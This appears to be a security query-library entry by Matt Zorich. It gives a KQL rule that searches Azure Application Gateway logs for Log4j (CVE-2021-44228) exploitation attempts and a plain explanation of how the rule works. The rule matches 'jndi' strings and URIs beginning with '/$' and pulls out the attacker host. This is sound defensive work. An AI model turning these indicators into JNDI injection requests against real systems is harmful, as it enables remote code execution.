Query Details
CVE 2021 44228
Query
//Detection rule for App Gateway rule hits for log4j vulnerability. Retrieve attacked host, malicious IP and malicious User Agent //Data connector required for this query - Azure Diagnostics (Application Gateways) AzureDiagnostics | where details_data_s contains "jndi" | parse-where details_data_s with * 'User-Agent:' MaliciousHost | project TimeGenerated, Target=hostname_s, Actor=clientIp_s, MaliciousHost //Detect uri directly where starts with /$ or contains ldap AzureDiagnostics | where TimeGenerated > ago(1d) | where ResourceType == "APPLICATIONGATEWAYS" | project TimeGenerated, host_s, originalRequestUriWithArgs_s, clientIP_s | where originalRequestUriWithArgs_s startswith "/$" or originalRequestUriWithArgs_s contains "jndi" | parse-where originalRequestUriWithArgs_s with * '://' MaliciousHost
Explanation
This query is looking for App Gateway rule hits related to the log4j vulnerability. It retrieves information about the attacked host, malicious IP, and malicious User Agent. It uses the Azure Diagnostics data connector for Application Gateways.
The first part of the query filters the AzureDiagnostics data based on the presence of "jndi" in the details_data_s field. It then extracts the malicious host from the User-Agent field and selects the TimeGenerated, Target (hostname), Actor (client IP), and MaliciousHost fields.
The second part of the query filters the AzureDiagnostics data based on the ResourceType being "APPLICATIONGATEWAYS" and the TimeGenerated being within the last 1 day. It selects the TimeGenerated, host, originalRequestUriWithArgs, and clientIP fields. It further filters the data to include only entries where the originalRequestUriWithArgs starts with "/$" or contains "jndi". It then extracts the malicious host from the originalRequestUriWithArgs field.
Details
Matt Zorich
Released: June 17, 2022
Tables
Keywords
Operators